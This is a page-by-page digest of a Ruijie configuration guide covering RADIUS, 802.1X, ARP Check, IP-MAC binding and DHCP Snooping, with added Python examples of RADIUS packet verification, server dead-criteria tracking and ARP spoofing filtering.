  • Page 769: Scenario  Configuration Guide Configuring RADIUS Application Description Authorization, and Accounting network, to prevent unauthorized access or operations. Services for Access Users Forcing Users to Go Offline The server forces an authenticated user to go offline. 3.2.1 Providing Authentication, Authorization, and Accounting Services for Access Users Scenario RADIUS is typically applied in the authentication, authorization, and accounting of access users.
  • Page 770 Configuration Guide Configuring RADIUS See Figure 3-1 for the networking topology. Deployment  Add the following deployment on the basis of 1.2.1 "Deployment".  Enable the RADIUS dynamic authorization extension function on the RADIUS client. 3.3 Features Basic Concepts  Client/Server Mode ...
  • Page 771 Configuration Guide Configuring RADIUS  Length: Identifies the length of a whole RADIUS packet, which includes Code, Identifier, Length, Authenticator, and Attributes. It occupies two bytes. Bytes that are beyond the Length field will be truncated. If the length of a received packet is smaller than the value of Length, the packet is discarded.
  • Page 772 Configuration Guide Configuring RADIUS Standard attributes (continued; the attribute numbers are the standard RADIUS types from RFC 2865, 2868 and 2869): Calling-Station-Id (31), NAS-Identifier (32), Proxy-State (33), Login-LAT-Service (34), Login-LAT-Node (35), Login-LAT-Group (36), Framed-AppleTalk-Link (37), Framed-AppleTalk-Network (38), Framed-AppleTalk-Zone (39), Acct-Status-Type (40), Acct-Delay-Time (41), Acct-Input-Octets (42), Prompt (76), Connect-Info (77), Configuration-Token (78), EAP-Message (79), Message-Authenticator (80), Tunnel-Private-Group-id (81), Tunnel-Assignment-id (82), Tunnel-Preference (83), ARAP-Challenge-Response (84), Acct-Interim-Interval (85), Acct-Tunnel-Packets-Lost (86), NAS-Port-Id (87).  Shared Key A RADIUS client and a RADIUS server mutually confirm their identities by using a shared key during communication. The shared key itself is never transmitted over the network.
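The packet rules on pages 771 and 772 (Length governs what is parsed, bytes past Length are ignored, a datagram shorter than Length is discarded; the shared key authenticates both sides without ever being sent) are shown below in a small RADIUS codec. This is an added example, not Ruijie or RGOS code: the secret `ruijie` (matching the `radius-server key ruijie` examples), the NAS address 10.1.1.2 and the user credentials are constructed for the demonstration; the MD5 constructions are those of RFC 2865.

```python
# Added example (not from the Ruijie manual): a minimal RADIUS packet codec that
# applies the Length rule and the shared-key rule described above.
# Shared secret, NAS address and user data below are constructed for the demo.
import hashlib
import hmac
import os
import struct

CODE_NAMES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
              4: "Accounting-Request", 5: "Accounting-Response"}
# Standard attribute types (RFC 2865/2869); a subset of the table above.
ATTR_NAMES = {1: "User-Name", 2: "User-Password", 4: "NAS-IP-Address", 18: "Reply-Message",
              31: "Calling-Station-Id", 32: "NAS-Identifier", 80: "Message-Authenticator",
              87: "NAS-Port-Id"}


def pap_password(secret: bytes, req_auth: bytes, password: bytes) -> bytes:
    """RFC 2865 section 5.2: the password is XORed with MD5(secret + authenticator),
    chained per 16-byte block. The secret itself never appears on the wire."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], pad))
        out += block
        prev = block
    return out


def encode_attrs(attrs) -> bytes:
    """Attributes are TLVs: Type (1 byte), Length (1 byte, includes the 2-byte header), Value."""
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def build_packet(code: int, ident: int, authenticator: bytes, attrs) -> bytes:
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def parse_packet(data: bytes) -> dict:
    """Length rule from the text: bytes beyond Length are ignored; a datagram shorter
    than Length is discarded (here: ValueError)."""
    if len(data) < 20:
        raise ValueError("shorter than the 20-byte RADIUS header")
    code, ident, length = struct.unpack("!BBH", data[:4])
    if length < 20 or length > 4096:
        raise ValueError("Length outside the valid range 20..4096")
    if len(data) < length:
        raise ValueError("datagram shorter than Length; discard")
    data = data[:length]
    attrs, pos = [], 20
    while pos < length:
        if length - pos < 2:
            raise ValueError("truncated attribute header")
        t, l = data[pos], data[pos + 1]
        if l < 2 or pos + l > length:
            raise ValueError("attribute length runs past the packet")
        attrs.append((t, data[pos + 2:pos + l]))
        pos += l
    return {"code": code, "id": ident, "length": length,
            "authenticator": data[4:20], "attrs": attrs}


def response_authenticator(secret, code, ident, length, req_auth, attr_bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, length)
    return hashlib.md5(header + req_auth + attr_bytes + secret).digest()


def verify_response(secret: bytes, req_auth: bytes, response: bytes) -> bool:
    """Client-side check that a reply came from a server holding the same secret and
    answers our request (the Request Authenticator is mixed in)."""
    p = parse_packet(response)
    expected = response_authenticator(secret, p["code"], p["id"], p["length"],
                                      req_auth, response[20:p["length"]])
    return hmac.compare_digest(expected, p["authenticator"])


def demo(secret: bytes = b"ruijie"):
    """Constructed exchange: Access-Request from the NAS, Access-Accept from the server."""
    req_auth = os.urandom(16)                   # fresh Request Authenticator per request
    req = build_packet(1, 7, req_auth, [(1, b"user"),
                                        (2, pap_password(secret, req_auth, b"pass")),
                                        (4, bytes([10, 1, 1, 2]))])
    assert secret not in req and b"pass" not in req   # neither secret nor password on the wire
    accept_attrs = encode_attrs([(18, b"welcome")])
    length = 20 + len(accept_attrs)
    resp_auth = response_authenticator(secret, 2, 7, length, req_auth, accept_attrs)
    resp = struct.pack("!BBH", 2, 7, length) + resp_auth + accept_attrs
    return (verify_response(secret, req_auth, resp),                # genuine reply
            verify_response(b"wrong-key", req_auth, resp),          # key mismatch: rejected
            verify_response(secret, req_auth, resp + b"\x00" * 3))  # bytes past Length ignored


if __name__ == "__main__":
    print(demo())
```

The check in `verify_response` is what makes the shared key matter operationally: a reply forged by a host that does not know the key, or a reply to a different request, fails the Response Authenticator comparison and must be dropped, which is also why a weak or reused `radius-server key` undermines every method list built on `group radius`.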
  • Page 773 RADIUS protocol to implement private functions or functions that are not defined in the standard RADIUS protocol. Table 1-3 lists private attributes supported by Ruijie products. The TYPE column indicates the default configuration of private attributes of Ruijie products and the Extended TYPE column indicates the default configuration of private attributes of other non-Ruijie products.
  • Page 774 Configuration Guide Configuring RADIUS Function / TYPE / Extended TYPE: ipv6-multicast-address, ipv4-multicast-address, sdg-type, sdg-zone-name, sdg-group-name. Overview Feature / Description: RADIUS Authentication, Authorization, and Accounting: Conducts identity authentication and accounting on access users, safeguards network security, and facilitates management for network administrators. Source Address of RADIUS Packets: Specifies the source IP address used by a RADIUS client to transmit packets to a RADIUS server.
  • Page 775 Configuration Guide Configuring RADIUS Figure 3-3 The RADIUS authentication and authorization process is described as follows: A user enters the user name and password and transmits them to the RADIUS client. After receiving the user name and password, the RADIUS client transmits an authentication request packet to the RADIUS server.
  • Page 776 Configuration Guide Configuring RADIUS Related Configuration  Configuring RADIUS Server Parameters No RADIUS server is configured by default. You can run the radius-server host command to configure a RADIUS server. At least one RADIUS server must be configured so that RADIUS services run normally. ...
  • Page 777 Configuration Guide Configuring RADIUS Run the ip radius source-interface command to specify the source interface for transmitting RADIUS packets. The device uses the first IP address of the specified interface as the source address of RADIUS packets. 3.3.3 RADIUS Timeout Retransmission Working Principle After a RADIUS client transmits a packet to a RADIUS server, a timer is started to detect the response of the RADIUS server.
  • Page 778 Configuration Guide Configuring RADIUS You can run the radius-server dead-criteria command to configure the criteria for the device to judge that the RADIUS security server is unreachable.  Configuring the Test User Name for Actively Detecting the RADIUS Security Server No test user name is specified for actively detecting the RADIUS security server by default.
  • Page 779 Configuration Guide Configuring RADIUS Configuration / Description and Command: ip radius source-interface: Configures the source address of RADIUS packets. (Optional) It is used to define attribute processing adopted when the device encapsulates and parses RADIUS packets. radius-server attribute 31: Configures the MAC address format of RADIUS attribute No.
  • Page 780 In an 802.1X authentication environment that uses the RADIUS security protocol, if a network device serves as the 802.1X authenticator and Ruijie SU is used as the 802.1X client software, it is recommended that radius-server timeout be set to 3 seconds (the default value is 5 seconds) and radius-server retransmit be set to 2 (the default value is 3) on the network device.
  • Page 781 Configuration Guide Configuring RADIUS Related Commands  Configuring the Remote RADIUS Security Server Command radius-server host { ipv4-address | ipv6-address } [ auth-port port-number ] [ acct-port port-number ] [ test username name [ idle-time time ] [ ignore-auth-port ] [ ignore-acct-port ] ] [ key [ 0 | 7 ] text-string ] Parameter Description oob: Indicates oob authentication, that is, the source interface for transmitting packets to the RADIUS server...
  • Page 782 Configuration Guide Configuring RADIUS The same shared key must be configured on the device and RADIUS security server so that they can communicate with each other successfully.  Configuring the Request Transmission Count, After Which the Device Confirms That a RADIUS Server Is Unreachable Command radius-server retransmit retries...
  • Page 783 (Scenario) Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 192.168.5.22 Ruijie(config)#radius-server host 3000::100 Ruijie(config)#radius-server key aaa Ruijie(config)#aaa authentication login test group radius Ruijie(config)#aaa authorization exec test group radius Ruijie(config)#aaa accounting exec test start-stop group radius Ruijie(config)#line vty 0 4...
  • Page 784 3.4.2 Configuring the RADIUS Attribute Type Configuration Effect  Define the attribute processing adopted when the device encapsulates and parses RADIUS packets. Notes  Private attributes involved in "Configuring the RADIUS Attribute Type" refer to Ruijie private attributes. Configuration Steps...
  • Page 785 Enable the device to interact with the RADIUS server. Conduct packet capture to display the MAC address format of Calling-Station-Id.  Enable the device to interact with the RADIUS server. Display the debug information of the device to check that Ruijie private attributes are correctly parsed by the device.
  • Page 786 Configuration Guide Configuring RADIUS  Enable the device to interact with the RADIUS server. Display the debug information of the device to check that the CUI attribute is correctly parsed by the device. Related Commands  Configuring the MAC Address Format of RADIUS Attribute No. 31 (Calling-Station-ID) Command radius-server attribute 31 mac format {ietf | normal | unformatted } Parameter...
  • Page 787 (Scenario) Configuration Guide Configuring RADIUS Parameter Description. Command Mode: Global configuration mode. Usage Guide: Configure this command to use the issued QoS value as the CoS value. The QoS value is used as the DSCP value by default.  Configures the Device to Support the CUI Attribute Command radius support cui Parameter...
  • Page 788 Ruijie(config)#radius attribute 16 vendor-type 211 Ruijie(config)#radius set qos cos Ruijie(config)#radius support cui Ruijie(config)#radius vendor-specific extend Ruijie(config)#no radius vendor-specific attribute support cisco Verification Conduct packet capture or display debug information of the device to check whether the RADIUS standard attributes and private attributes are encapsulated/parsed correctly.
  • Page 789 Configuration Guide Configuring RADIUS  After the previous correct response is received from the RADIUS server, the count that the device transmits requests to the RADIUS server but fails to receive correct responses (including retransmission) reaches the value set in radius-server dead-criteria tries number.
  • Page 790 (Scenario) RADIUS Client: Ruijie(config)#radius-server dead-criteria time 120 tries 5 Ruijie(config)#radius-server host 192.168.5.22 test username test ignore-acct-port idle-time 90 Verification: Disconnect the network communication between the device and the server with the IP address of 192.168.5.22. Conduct RADIUS authentication through the device. After 120 seconds, run the show radius...
  • Page 791 Configuration Guide Configuring RADIUS Ruijie#show running-config … radius-server host 192.168.5.22 test username test ignore-acct-port idle-time 90 radius-server dead-criteria time 120 tries 5 … 3.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description Command...
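  The dead-criteria passage above combines a time criterion and a tries criterion. The following Python model (an added example, not RGOS code) replays a sequence of unanswered requests and correct responses against the page's configuration of time 120 and tries 5, so the two criteria can be seen interacting. It assumes that both criteria must hold before the server is judged unreachable, and that one correct response resets both; the manual excerpt does not spell out either point.

```python
from dataclasses import dataclass


@dataclass
class DeadCriteria:
    """Mirrors 'radius-server dead-criteria time <secs> tries <count>'."""
    time_secs: int
    tries: int


class RadiusServerTracker:
    """Tracks whether one RADIUS server should be judged unreachable.

    Assumption (not stated in the excerpt): both criteria must be met, i.e. at
    least `tries` requests (retransmissions included) have gone unanswered since
    the previous correct response AND at least `time_secs` seconds have elapsed
    since that response.
    """

    def __init__(self, criteria, now):
        self.criteria = criteria
        self.last_good_response = now   # time of the previous correct response
        self.unanswered = 0             # requests without a correct response since then
        self.dead = False

    def on_request_unanswered(self, now):
        """A request or retransmission timed out without a correct response."""
        self.unanswered += 1
        elapsed = now - self.last_good_response
        if self.unanswered >= self.criteria.tries and elapsed >= self.criteria.time_secs:
            self.dead = True
        return self.dead

    def on_correct_response(self, now):
        """A correctly authenticated response resets both counters and revives the server."""
        self.last_good_response = now
        self.unanswered = 0
        self.dead = False
        return self.dead


def simulate(criteria, events, start=0):
    """Replay (time, outcome) events, outcome being 'ok' or 'timeout'.

    Returns the dead flag after each event, e.g. [False, False, True].
    """
    tracker = RadiusServerTracker(criteria, start)
    flags = []
    for t, outcome in events:
        if outcome == "ok":
            flags.append(tracker.on_correct_response(t))
        else:
            flags.append(tracker.on_request_unanswered(t))
    return flags
```

  With time 120 tries 5, five timeouts inside the first 25 seconds are not enough on their own, and neither is a single timeout 200 seconds later; only when both thresholds are crossed does the flag flip, and the next good response clears it. That is why the verification step on the page waits 120 seconds before checking.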
  • Page 792 Configuration Guide Configuring RADIUS Description / Command: Debugs the RADIUS event: debug radius event. Debugs RADIUS packet printing: debug radius detail. Debugs the RADIUS dynamic authorization extension function: debug radius extension event. Debugs RADIUS dynamic authorization extension packet printing: debug radius extension detail.
  • Page 793 (Scenario) Wireless stations or devices (STAs) should pass 802.1X authentication to access the enterprise network. As shown in Figure 4-1:  STAs are installed with 802.1X clients (which can come with the operating system, or others like Ruijie Supplicant).
  • Page 794 Configure RADIUS parameters to ensure proper communication between the AC and the RADIUS server. For details, see the Configuring RDS.  If a Ruijie RADIUS server is used, configure SNMP parameters to allow the RADIUS server to manage devices, such as querying and setting. ...
  • Page 795 MAC address bypass (MAB) authentication means that the MAC address is used as the user name and password for authentication. Since Ruijie Supplicant cannot be installed on some dumb terminals such as network printers, use MAB to perform security control.
  • Page 796 Configuration Guide Configuring 802.1X  RIPT Using Remote Intelligent Perceptive Technology (RIPT), an AP can continue to provide WLAN services to customers when the AC is faulty or disconnected from the AP. 802.1X supports this technology. 802.1X on such APs can continue to provide authentication service for customers.
  • Page 797 Configuration Guide Configuring 802.1X client support embedded in the operating system, Ruijie has launched a Ruijie Supplicant compliant with the 802.1X standard.  Authenticator The authenticator is usually an NAS such as a switch or wireless access hotspot. It controls the network connection of a client based on the client's authentication status.
  • Page 798 Authenticating User Status 802.1X determines whether a user on a port can access the network based on the authentication status of the port. Ruijie products extend 802.1X and, by default, realize access control based on users (a wired user is identified by the MAC address).
  • Page 799 Supplicant A user should start Ruijie Supplicant to enter the user name and initiate authentication. If the operating system has its own authentication client and the network is available, a dialog box will be displayed, asking the user to enter the user name.
  • Page 800 Cisco-proprietary attributes. For details, see the software description related to the RADIUS server.  Kickoff Used with RG-SAM/SMP, the Ruijie 802.1X server can kick off online users, who are then disconnected from the network. This function applies to the environment where the maximum online period and real-time accounting check function are configured.
  • Page 801 Configuration Guide Configuring 802.1X  Accounting End After a user goes offline, the NAS sends the RADIUS server an accounting end packet carrying the online period and traffic of the user. The RADIUS server generates online records based on the information carried in this packet. 4.3.4 RIPT 802.1X-enabled STAs support RIPT.
  • Page 802 NAS and the RADIUS server. (Optional) It is used to configure 802.1X parameters. Ensure that the 802.1X server timeout is longer than the RADIUS server timeout. Online Ruijie client detection applies only to Ruijie Supplicant. dot1x re-authentication: Enables re-authentication. dot1x timeout re-authperiod: Configures the re-authentication interval.
  • Page 803 Configuration Guide Configuring 802.1X dot1x event server-invalid action bypass-wlan: Configures the bypass WLAN for the RADIUS server. dot1x encryption only: Configures 802.1X authentication encryption only when 802.1X and Web authentication are both enabled. dot1x logging rate-limit: Limits the rate of printing online and offline logs.
  • Page 804 Configuration Guide Configuring 802.1X Configuration Steps  Enabling AAA  (Mandatory) 802.1X authentication and accounting take effect only after AAA is enabled.  Enable AAA on the NAS that needs to control user access by 802.1X. Command aaa new-model Parameter Description Defaults AAA is disabled by default.
  • Page 805 If 802.1X is enabled on a WLAN, only 802.11 management frames and EAP packets are allowed to pass.  For related commands, see the Configuring RSNA. Verification Start Ruijie Supplicant, enter the correct account information, and initiate authentication. Then check whether the 802.1X and RADIUS configurations are correct.  Checking for 802.1X Authentication Entries...
  • Page 806 (Scenario) Checking for AAA User Entries. Command: show aaa user all. Parameter Description. Command Mode: Privileged EXEC mode/Global configuration mode/Interface configuration mode. Usage Guide: Display information of AAA users. Command Display: Ruijie#show aaa user all ----------------------------- Id Name ----- 2345687901 wwxy -----------------------------  ...
  • Page 807 (Scenario)  The user fails to ping 192.168.32.120 before authentication.  After the user enters account information and clicks Authenticate on Ruijie Supplicant, the authentication succeeds and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed.
  • Page 808  The user fails to ping 192.168.32.120 before authentication.  After the user enters account information and clicks Authenticate on Ruijie Supplicant, the authentication succeeds and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed.
  • Page 809 Configuration Guide Configuring 802.1X  Adjust 802.1X parameter configurations based on the actual network situation. For example, if the authentication server has poor performance, you can raise the authentication server timeout. Notes  802.1X and RADIUS have separate server timeouts. By default, the authentication server timeout of 802.1X is 5 seconds while that of RADIUS is 15 seconds.
  • Page 810 Configuration Guide Configuring 802.1X Parameter Description: period: Indicates the interval of EAP-Request/Identity packet retransmission in the unit of seconds. Defaults: The default value is 30 seconds. Command Mode: Global configuration mode. Usage Guide: It is recommended to use the default value. Adjust the value based on how long the authentication client takes to respond to the NAS's requests.
  • Page 811 Configuration Guide Configuring 802.1X Parameter Description: num: Indicates the maximum times of EAP-Request/Challenge packet retransmission in the unit of seconds. Defaults: The default value is 3. Command Mode: Global configuration mode. Usage Guide: Optional. It is recommended to use the default value. Increase this value in the case of high-rate packet loss. ...
  • Page 812 (Scenario) Defaults: The default value is eap. Command Mode: Global configuration mode. Usage Guide: Select the authentication mode supported by Ruijie Supplicant and the authentication server. Verification: Run the show dot1x command to check whether parameter configurations take effect. Configuration Example ...
  • Page 813 Configuration Guide Configuring 802.1X Common Errors  The server timeout is shorter than the RADIUS timeout. 4.4.3 Configuring MAB Configuration Effect  On WLANs, WLAN-based MAB is supported. If MAB is enabled, the NAS automatically associates the MAC address of an STA on the WLAN as the user name and password to initiate authentication to the authentication server.
  • Page 814 (Scenario)  NAS configurations are as follows. For detailed configuration on the RADIUS server, see the Configuring RADIUS. ruijie# configure terminal ruijie(config)# aaa new-model ruijie(config)# radius-server host 192.168.32.120 ruijie(config)# radius-server key ruijie ruijie(config)# wlansec 1 ruijie(config-wlansec)# dot1x-mab Verification Check whether authentication is proper and network access behaviors change after authentication.
  • Page 815 (Scenario)  The user connects to the NAS, the authentication succeeds, and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed. ruijie# show dot1x summary Username Interface VLAN Auth-State Backend-State Port-Status User-Type Time --------- ---------- -------------- --------- ---- --------------- ------------- ----------- --------- ------------------ 16778217 0023aea...
  • Page 816 (Scenario) The multi-account function must be disabled if accounting is enabled. Otherwise, accounting may be inaccurate.  IP-based accounting is not required in two situations: - IPv4 addresses and Ruijie Supplicant are deployed. This function is not required because Ruijie Supplicant can upload the IPv4 addresses of users. - Static IP addresses are deployed.
  • Page 817 Configuration Guide Configuring 802.1X Defaults: Multi-account authentication is disabled by default. Command Mode: Global configuration mode. Usage Guide: Configure this command when multi-account authentication is required in 802.1X authentication, e.g. in the case of Windows domain authentication. In this case, the authentication client can directly use a new account to initiate authentication while the previous account is still online.
  • Page 818 Configuration Guide Configuring 802.1X Command: dot1x valid-ip-acct timeout time. Parameter Description: time: Indicates the timeout in the unit of minutes. Defaults: The default value is 5 minutes. Command Mode: Global configuration mode. Usage Guide: It is recommended to use the default value. Configure this command when there is a need to change the IP address obtaining timeout after users pass authentication.
  • Page 819 Configuration Guide Configuring 802.1X Parameter Description: value: Indicates the syslog printing rate per second upon users going online/offline. The default value is 5 per second. 0 indicates no rate limit. Defaults: The default value is 5 per second. Command Mode: Global configuration mode. Generally it is recommended to use the defaults.
  • Page 820 Configuration Guide Configuring 802.1X  (Optional) If this function is enabled, online users always use the accounting update interval assigned by the authentication server upon the first authentication, instead of the accounting update interval configured on the NAS. Command dot1x acct-update base-on first-time server Parameter Description Defaults...
  • Page 821 Configuration Guide Configuring 802.1X show dot1x port-control: Displays the information of controlled ports. show dot1x re-authentication: Displays the re-authentication status. show dot1x reauth-max: Displays the maximum times of EAP-Request/Identity packet retransmission. show dot1x timeout quiet-period: Displays the quiet period after authentication fails. show dot1x timeout re-authperiod: Displays the re-authentication...
  • Page 822 Configuration Guide Configuring 802.1X debug dot1x packet: Debugs 802.1X packets. debug dot1x stm: Debugs the 802.1X state machine (STM). debug dot1x com: Debugs 802.1X internal communication. debug dot1x error: Debugs 802.1X errors...
  • Page 823 Configuration Guide Configuring ARP Check 5 Configuring ARP Check 5.1 Overview The Address Resolution Protocol (ARP) packet check filters all ARP packets under ports (including wired layer-2 switching ports, layer-2 aggregate ports (APs), and layer-2 encapsulation sub-interfaces, as well as WLAN interfaces) and discards illegal ARP packets, so as to effectively prevent ARP deception via networks and to promote network stability.
  • Page 824 (Scenario) Configuration Guide Configuring ARP Check 5.2.1 Filtering ARP Packets in Networks Scenario Check ARP packets from distrusted ports and filter out ARP packets with addresses not matching the results assigned by the DHCP server. For example, in the following figure, the ARP packets sent by DHCP clients are checked. ...
  • Page 825 Configuration Guide Configuring ARP Check The ARP Check has two modes: Enabled and Disabled. The default is Enabled. Enabled Mode Through ARP Check, ARP packets are detected based on the IP/IP-MAC based binding information provided by the following modules. ...
  • Page 826 Configuration Guide Configuring ARP Check 5.4 Configuration Configuration / Description and Command: (Mandatory) It is used to enable ARP Check. Configuring ARP Check: arp-check: Enables ARP Check. 5.4.1 Configuring ARP Check Configuration Effect  Illegal ARP packets are filtered out. Notes ...
  • Page 827 Configuration Guide Configuring ARP Check Usage Guide Generate ARP filtering information according to the legal user information of security application modules to filter out illegal ARP packets in networks. Configuration Example The following configuration example introduces only ARP Check related configurations. ...
  • Page 828 Configuration Guide Configuring ARP Check Ruijie# configure terminal Ruijie(config)#address-bind 192.168.1.3 00D0.F800.0003 Ruijie(config)#address-bind install Ruijie(config)#ip source binding 00D0.F800.0002 vlan 1 192.168.1.4 interface gigabitEthernet 0/1 Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#arp-check Ruijie(config-if-GigabitEthernet 0/1)#ip verify source port-security Ruijie(config-if-GigabitEthernet 0/1)#switchport port-security Ruijie(config-if-GigabitEthernet 0/1)#switchport port-security binding 00D0.F800.0001 vlan 1 192.168.1.1...
  • Page 829 Configuration Guide Configuring ARP Check Verification Use the show interface arp-check list command to display the effective ARP Check list for interfaces. Ruijie# show interface arp-check list INTERFACE SENDER MAC SENDER IP POLICY SOURCE ------------------------ -------------------- -------------------- -------------------- GigabitEthernet 0/1 00d0.f800.0003...
  • Page 830 (Scenario) Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention 6 Configuring Gateway-targeted ARP Spoofing Prevention 6.1 Overview Gateway-targeted Address Resolution Protocol (ARP) spoofing prevention effectively prevents gateway-targeted ARP spoofing by checking on the logical port whether the source IP addresses of ARP packets (Sender IP fields of ARP packets) are the self-configured gateway IP addresses.
  • Page 831 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention Deployment  On the access switch (Switch A), enable gateway-targeted spoofing prevention on the ports (Gi 0/3 and Gi 0/4 in this case) directly connected to the PC. The gateway addresses include intranet gateway address and intranet server address.
  • Page 832 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention from User A to the gateway during communication will be sent to User B. In this way, User A's communications are intercepted, thereby causing ARP spoofing. Overview Feature / Description: Gateway-targeted ARP Spoofing Prevention: Blocks ARP spoofing packets with forged gateway address and intranet server IP addresses to ensure that users can access the Internet.
  • Page 833 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention  Configuring Gateway-targeted Spoofing Prevention  Gateway-targeted ARP spoofing prevention is mandatory. It must be enabled. Verification  Run the show run command to check configuration.  Run the show anti-arp-spoofing command to display all data on gateway-targeted ARP spoofing prevention. Related Commands ...
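  The ARP Check chapter (bindings per interface, as shown by show interface arp-check list) and the gateway-targeted spoofing prevention chapter (Sender IP compared with the protected gateway addresses on user ports) describe two filters that a practitioner usually runs together. The Python below is an added example written for this page, not RGOS code: it loads the three bindings from the manual's ARP Check example on GigabitEthernet 0/1 and gives a verdict for each ARP packet. The gateway address 192.168.1.254, the uplink port name GigabitEthernet 0/24 and the MAC 0000.5e00.0101 are constructed values.

```python
from dataclasses import dataclass, field


def norm_mac(mac):
    """Normalise '00D0.F800.0003' or '00:d0:f8:00:00:03' to 12 lowercase hex digits."""
    return "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")


@dataclass
class PortPolicy:
    arp_check: bool = False             # 'arp-check' configured on the interface
    anti_gateway_spoof: bool = False    # gateway-targeted spoofing prevention on the port
    # (sender MAC, sender IP) pairs accepted on this interface, i.e. the rows of
    # 'show interface arp-check list' (address-bind, IP Source Guard, port-security).
    bindings: set = field(default_factory=set)


class ArpFilter:
    def __init__(self, ports, gateway_ips):
        self.ports = ports
        self.gateway_ips = set(gateway_ips)   # gateway and intranet server addresses

    def inspect(self, port_name, sender_mac, sender_ip):
        """Return 'forward' or 'drop:<reason>' for one ARP packet received on a port."""
        policy = self.ports.get(port_name, PortPolicy())
        # Gateway-targeted check: a user port must never announce the gateway's IP.
        if policy.anti_gateway_spoof and sender_ip in self.gateway_ips:
            return "drop:gateway-spoof"
        # ARP Check: the sender MAC/IP pair must match a binding on this interface.
        if policy.arp_check and (norm_mac(sender_mac), sender_ip) not in policy.bindings:
            return "drop:arp-check"
        return "forward"


def build_example_filter():
    """Bindings from the manual's ARP Check example; gateway and uplink are constructed."""
    gi01 = PortPolicy(
        arp_check=True,
        anti_gateway_spoof=True,
        bindings={
            (norm_mac("00D0.F800.0003"), "192.168.1.3"),   # address-bind
            (norm_mac("00D0.F800.0002"), "192.168.1.4"),   # ip source binding
            (norm_mac("00D0.F800.0001"), "192.168.1.1"),   # switchport port-security binding
        },
    )
    uplink = PortPolicy()   # constructed uplink toward the real gateway: no checks
    return ArpFilter(
        {"GigabitEthernet 0/1": gi01, "GigabitEthernet 0/24": uplink},
        gateway_ips=["192.168.1.254"],                     # constructed gateway address
    )
```

  The gateway check runs first so that a forged gateway announcement is reported as such even when ARP Check alone would also have dropped it; the real gateway answering on the unchecked uplink is still forwarded.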
  • Page 834 (Scenario) Configuration Guide Configuring Global IP-MAC Binding 7 Configuring Global IP-MAC Binding 7.1 Overview Enable the global IP-MAC binding function manually to verify the input packets. If a specified IP address is bound with a MAC address, the device receives only the IP packets containing matched IP address and MAC address. The other packets are discarded.
  • Page 835 Configuration Guide Configuring Global IP-MAC Binding IP Network is an external IP network. Deployment  Manually configure the global IP-MAC binding. (Take three users as an example.) User MAC Address IP Address User 1 00d0.3232.0001 192.168.1.10 User 2 00d0.3232.0002 192.168.1.20 User 3 00d0.3232.0003 192.168.1.30...
  • Page 836 Configuration Guide Configuring Global IP-MAC Binding By default, the IP-MAC binding function takes effect on all ports of the device. You can configure exclude ports so that the address binding function does not take effect on these ports. In practice, the IP-MAC bindings of the input packets on the uplink port are not fixed.
  • Page 837 Configuration Guide Configuring Global IP-MAC Binding 7.3.3 Configuring the Exclude Port Working Principle Configure an exclude port so that the address binding function does not take effect on this port. Related Configuration  Configuring the Exclude Port Run the address-bind uplink command to configure an exclude port. By default, no port is the exclude port. 7.4 Configuration Configuration Description and Command...
  • Page 838  Steps Enable the address binding function. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Verification Display the global IP-MAC binding on the device. Ruijie#show address-bind Total Bind Addresses in System : 1...
  • Page 839 Configuration  Steps Enable the address binding function.  Set the IPv6 address binding mode to Compatible. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Ruijie(config)# address-bind ipv6-mode compatible...
  • Page 840 Configuration Usage Configuration Example  Configuring the Exclude Port  Configuration Create a global IPv4-MAC binding.  Steps Enable the address binding function.  Configure an exclude port. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z.
  • Page 841 Configuration Guide Configuring Global IP-MAC Binding Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Ruijie(config)# address-bind uplink GigabitEthernet 0/1 Verification Display the global IP-MAC binding on the device. Ruijie#show address-bind Total Bind Addresses in System : 1 IP Address Binding MAC Addr...
  • Page 842 (Scenario) Configuration Guide Configuring DHCP Snooping 8 Configuring DHCP Snooping 8.1 Overview DHCP Snooping: DHCP Snooping snoops DHCP interactive packets between clients and servers to record and monitor users' IP addresses and filter out illegal DHCP packets, including client request packets and server response packets. The legal user database generated from DHCP Snooping records may serve security applications like IP Source Guard.
  • Page 843 (Scenario) Configuration Guide Configuring DHCP Snooping Figure 8-1 Remarks: S is an access device. A is a user PC. B is a DHCP server within the controlled area. C is a DHCP server out of the controlled area. Deployment  Enable DHCP Snooping on S to realize DHCP packet monitoring. ...
  • Page 844 (Scenario) Configuration Guide Configuring DHCP Snooping  Limit the rates of DHCP packets from the untrusted ports.  Enable DHCP Snooping correlation with ARP, and detect whether the user is online. 8.2.3 Guarding Against Forged DHCP Packets Scenario Potential malicious clients in a network may forge DHCP request packets, consuming applicable IP addresses from the servers and probably preempting legal users' IP addresses.
  • Page 845 (Scenario) Configuration Guide Configuring DHCP Snooping 8.2.4 Guarding Against IP/MAC Spoofing Scenario Check IP packets from untrusted ports to filter out forged IP packets based on IP or IP-MAC fields. For example, in the following figure, the IP packets sent by DHCP clients are validated. ...
